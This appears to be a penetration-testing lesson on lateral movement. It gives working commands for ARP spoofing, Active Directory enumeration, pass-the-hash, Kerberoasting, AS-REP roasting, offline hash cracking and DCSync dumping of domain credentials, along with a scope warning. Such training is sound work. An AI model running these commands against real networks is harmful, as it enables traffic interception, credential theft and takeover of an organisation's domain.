Once you have compromised a single host, lateral movement is the process of pivoting through the network to reach higher-value targets — domain controllers, databases, file servers, and other critical infrastructure. This lesson covers network-level attacks, Active Directory exploitation, and pivoting techniques.
Scope warning: Lateral movement can quickly take you beyond your authorised scope. Always verify that each target is within the rules of engagement before proceeding.
ARP spoofing allows an attacker to intercept traffic between two hosts on the same network segment:
Normal Communication:
Host A ──────── Switch ──────── Host B
ARP Spoofed (Man-in-the-Middle):
Host A ──────── Attacker ──────── Host B
(intercepting traffic)
# Using arpspoof (part of dsniff)
# Enable IP forwarding first
echo 1 > /proc/sys/net/ipv4/ip_forward
# Spoof — tell the gateway you are the target
arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.100
# Using Bettercap (more modern)
bettercap -iface eth0
> net.probe on
> set arp.spoof.targets 192.168.1.100
> arp.spoof on
> net.sniff on
Active Directory (AD) is the backbone of most corporate Windows networks. Compromising AD typically means compromising the entire organisation.
# Using BloodHound — maps AD attack paths visually
# 1. Collect data with SharpHound
.\SharpHound.exe -c All
# 2. Import the ZIP into BloodHound
# 3. Query for shortest path to Domain Admin
# Using PowerView (PowerShell)
Import-Module .\PowerView.ps1
Get-DomainUser
Get-DomainGroup -Identity "Domain Admins"
Get-DomainComputer
Find-LocalAdminAccess
If you capture an NTLM hash, you can authenticate without knowing the plaintext password:
# Using crackmapexec
crackmapexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
# Using Impacket's psexec
impacket-psexec administrator@192.168.1.100 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
# Using Impacket's wmiexec (stealthier)
impacket-wmiexec administrator@192.168.1.100 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Kerberoasting extracts service account TGS tickets, which can be cracked offline:
# Using Impacket
impacket-GetUserSPNs domain.local/user:password -dc-ip 192.168.1.10 -request
# Using Rubeus (on Windows)
.\Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
# Crack with hashcat
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
AS-REP roasting targets accounts with "Do not require Kerberos preauthentication" enabled, since the KDC returns an encrypted AS-REP that can be cracked offline:
# Using Impacket (write the AS-REP hashes to the file cracked below)
impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip 192.168.1.10 -no-pass -outputfile asrep_hashes.txt
# Crack with hashcat (mode 18200 = Kerberos 5 AS-REP etype 23)
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
With sufficient AD privileges (directory replication rights), extract all password hashes from the domain controller via DCSync:
# Using Impacket's secretsdump
impacket-secretsdump domain.local/admin:password@192.168.1.10
# Using Mimikatz
mimikatz # lsadump::dcsync /domain:domain.local /user:krbtgt